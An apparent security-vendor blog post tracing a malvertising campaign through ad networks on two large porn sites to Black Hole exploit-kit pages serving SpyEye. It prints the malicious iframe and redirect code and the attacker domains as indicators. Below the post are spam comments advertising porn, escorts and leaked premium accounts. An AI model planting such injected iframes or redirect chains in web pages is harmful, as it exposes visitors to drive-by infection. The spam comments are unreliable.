Porn sites have lots of traffic...and malvertisements

(Credits: Chris Hsiao, NightCola Lin, Wayne Huang)

If you walk into our office after work hours and see a couple of us surrounding Chris' seat, starring at his multiple big screens showing lots of porn....believe us we'll actually working hard.

At Armorize we actively scan the Web for malware. Of course we can't cover the entire Web so we try to at least have a decent coverage of the bigger Websites. When we setup the platform sometime in the past, one thing we immediately noticed was: wow, so a good percentage of the "bigger Websites" on the internet (those with lots of traffic) are porn sites!

And then as we started to run the scanning operation we soon also realized that porn sites not only have a lot of traffic, but they often fall victim to malvertising.

In malvertising, malicious advertisements (malvertisements) are served by publishers (websites) to visitors. If the malvertisement involves drive-by download exploits, then the visitor can get infected without him knowing anything or having to click on or agree to anything.

Here's our report of how an malicious advertiser, celeb-escorts.com, got two very large websites to serve its malvertisement.

The first website is pornhub.com, Alexa Top 62 with 23,873,546 unique visitors per day.

Very large traffic indeed. Malvertisement provided to pornhub.com by etology.com, an ad exchange. etology loads the malvertisement from its advertiser, celeb-escorts.com, whose domain was created on May 11th, 2011. And so, it is very possible that celeb-escorts.com was registered by a malicious party with the purpose of submitting malvertisements to AD networks and exchanges. Below is an illustration of the parties involved:

This is the particular malvertisement from celeb-escorts, that included an iframe to tun4atta.in, the start of a chain of malicious domains:

Here are the detailed chain and code snippets:

1. http://www.pornhub.com/

2. http://delivery.trafficjunky.net/deliver2.php?zone_id=5&site_id=2&c=frontpage

3. http://delivery.trafficjunky.net/batch/bootstrap-ph-footer/

4. http://delivery.trafficjunky.net/batch.php?&data=%5B%7B%22unique%22%3Atrue%2C%22spots%22%3A%5B%7B%22site%22%3A2%2C%22zone%22%3A27%2C%22element_id%22%3A%22footer1%22%2C%22context%22%3A%22%22%2C%22userContext%22%3A%22%22%7D%2C%7B%22site%22%3A2%2C%22zone%22%3A27%2C%22element_id%22%3A%22footer2%22%2C%22context%22%3A%22%22%2C%22userContext%22%3A%22%22%7D%2C%7B%22site%22%3A2%2C%22zone%22%3A27%2C%22element_id%22%3A%22footer3%22%2C%22context%22%3A%22%22%2C%22userContext%22%3A%22%22%7D%5D%7D%5D&_callback=window.request.onSuccess%28%29

5. http://media.trafficjunky.net/cdn_custom_ads/cpakarll/etologyftsq.html

6. http://pages.etology.com/imp2/93114.php

<html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><title></title></head><body style="border:0px;margin:0px"><script type="text/javascript">var ad={space:{id:93114,type:2,alignment:2,publisherid:52408,siteid:85149,cobrandingid:1,spacename:'Pornhub 300x250 footer rev',domain:'http%3A%2F%2Fwww%2Epornhub%2Ecom',broker_link:'http://www.etology.com/buying-space-detail.php?id=93114&EID=77408',click_target:'_blank',enable_auto_collapse:'no',style1:{width:300,height:250,rows:1,cols:1,broker_link:'Advertise Here',show_broker_link:'false',background_color:'TRANSPARENT',table_style:'cellspacing=3',border_style:'',title_style:'',description_style:'',broker_link_style:'font-size:11px;font-family:Arial;color:#000000;text-align:center;text-decoration:;font-weight:;font-style:',resize:'false'},style2:{},galleries:[{id:2624,handle:'Jiwon',age:'21',headline:'want my Black Hole?',version_number:'1',media_ext:'gif'},{id:2754,handle:'Bekky',age:'19',headline:'Are thier any single fathers?',version_number:'1',media_ext:'gif'}]},payments:[{link:'http%3A%2F%2F',isAutoCollapseAd:'no',is3rdPartyAd:'true',id:174131,adid:174131,advertiserid:51689,bannerCode:"\074iframe src=http://celeb-escorts.com/banners/300x250.jpg width=\'300\'\r\nheight=\'250\' frameborder=\'0\' scrolling=\'no\' marginheight=0\r\nmarginwidth=0>\074/iframe>",matched_keyword:'',pass_search:''}],proxy_domain:'',clicks:['6f3dff7061a304100b74ca4bbb55a0c0dc36f1d720f4ec84cbd6883f8541ec4c5c28a159f6fc7bd4d7731ac4f29e3654eb845de85231ecf48201be15b98bad226e80eeb5f5e7c9a5']};</script><script type="text/javascript" src='http://media.etology.com/transformer/v41/ads2.js'></script></body></html>

7. http://celeb-escorts.com/banners/300x250.jpg

<a href='http://celeb-escorts.com/' target='_parent'><img src='http://celeb-escorts.com/images/banner-300x250.jpeg' border=0></a><iframe src='http://tun4atta.in/bcounter.php?u=adult' width='46' height='51' frameborder='0' scrolling='no'></iframe>

8. http://tun4atta.in/bcounter.php?u=adult

<iframe width='34' height='44' frameborder='0' scrolling='no' src='http://iban6duo.in/ts/in.cgi?adult'></iframe>

9. http://iban6duo.in/ts/in.cgi?adult

<html>
<head>
<meta http-equiv="REFRESH" content="1; URL='http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb'">
</head>
<body>
document moved <a href="http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb">here</a>
</body>
</html>

10. http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb
(Above serves the final malware)

The browser exploits were serving using the Black Hole exploit pack. The finally installed malware kept on changing since our initial discovery on May 13th.

The initial malware that was installed on vistors' machines was SpyEye, a crimeware similar to Zeus. Antivirus detection rate at that time was 3 out of 42 vendors on VirusTotal; it has since increase to 21 out of 42 vendors.

The current malware being served is still SpyEye, but re-packed and thus having a 5 out of 42 detection rate on VirusTotal.

The second website is tube8.com, Alexa Top 113 with 10,885,350 unique visitors per day.

The top-level AD agency is the same--Traffic Junky (trafficjunky.net), and the AD exchange is the same as well--etology.com. We can actually see the same malvertisement from celeb-escorts.com on tube8.com:

Below is an illustration of the chain:

The detailed traffic chain is below:

1. http://tube8.com

2. http://delivery.trafficjunky.net/deliver2.php?zone_id=42&site_id=13&cache=1305558225&c=HomePage

3. http://media.trafficjunky.net/cdn_custom_ads/pornhublive/T8ftphl.html

<iframe src="http://ifa.camads.net/dif/?cid=tube8-footer-950x300" allowtransparency=true width=950 height=300 frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>


4. http://ifa.camads.net/dif/?cid=tube8-footer-950x300

5. http://pages.etology.com/imp2/96244.php

6. http://celeb-escorts.com/banners/300x250.jpg

7. http://tun4atta.in/bcounter.php?u=adult

<iframe width='34' height='44' frameborder='0' scrolling='no' src='http://iban6duo.in/ts/in.cgi?adult'></iframe>

8. http://iban6duo.in/ts/in.cgi?adult

<html>
<head>
<meta http-equiv="REFRESH" content="1; URL='http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb'">
</head>
<body>
document moved <a href="http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb">here</a>
</body>
</html>

9. http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb
(Above serves the final malware)

With these two sites having 23,873,546 and 10,885,350 unique visitors per day, respectively, and serving this malvertisement from celeb-escorts.com since May 13th, there should have been a good number of infected visitors.

12 comments:

Robin harry said...

Porno videa každý deň len pre vás a zadarmo.

porno

Robin harry said...

Porno videa každý deň len pre vás a zadarmo.

http://vyhon.sk/

Schenky said...

Najlepšie porno videa zadarmo

Yersi2655 said...

http://updatespasswordspremium.blogspot.com

Accounts premium 2013 new accounts every weeks for the Best Porn Sites

Denverj97 said...

just curious to know how much a porn site can generate in revenue since that info is never public, but i'm sure some insiders would know.

Tube Porn

joseph said...

Hi …

Friends I am Josef Mengele from London. I need the Escorts
Service. I am search on Google, then I am found the Nandani Gupta Web site.
Nandani Gupta is the best Escorts service provider. Escorts in Delhi
.

All in All seo said...

» Thai Oral Sex Stories
» Free sex videos
» Free porn movies

Nong-Porn said...

If you like watching asian girl get fucked.

Free Asian Porn Tube

bilua khaiba said...

car hire,car hire,car hire,car hire,car hire,car hire,car hire,car hire,car hire,car hire,car hire,car hire










https://www.whatdotheyknow.com/request/limobrokercouk_limo_broker_ltd

nilupoma said...

This site caters to lesbians|, bisexuals, transgendered people, and even gay men. This ad-free, not-for-profit site doesn't collect your personal information or use "cookies," so browse away discreetly at their wide array of saucy tales. You can even browse by author!

Bria Bridgitte said...

find your horny and sexy partner with adultpunter.com

Bria Bridgitte said...

adultpunter.com the best worldwide dating and classified to promote your business in front of a high audience.

Post a Comment